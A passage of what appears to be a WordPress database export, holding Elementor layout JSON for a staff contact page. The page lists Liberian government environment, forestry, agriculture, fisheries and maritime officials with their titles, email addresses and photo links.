",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24378,3592,'_elementor_edit_mode','builder'),(24379,3592,'_elementor_t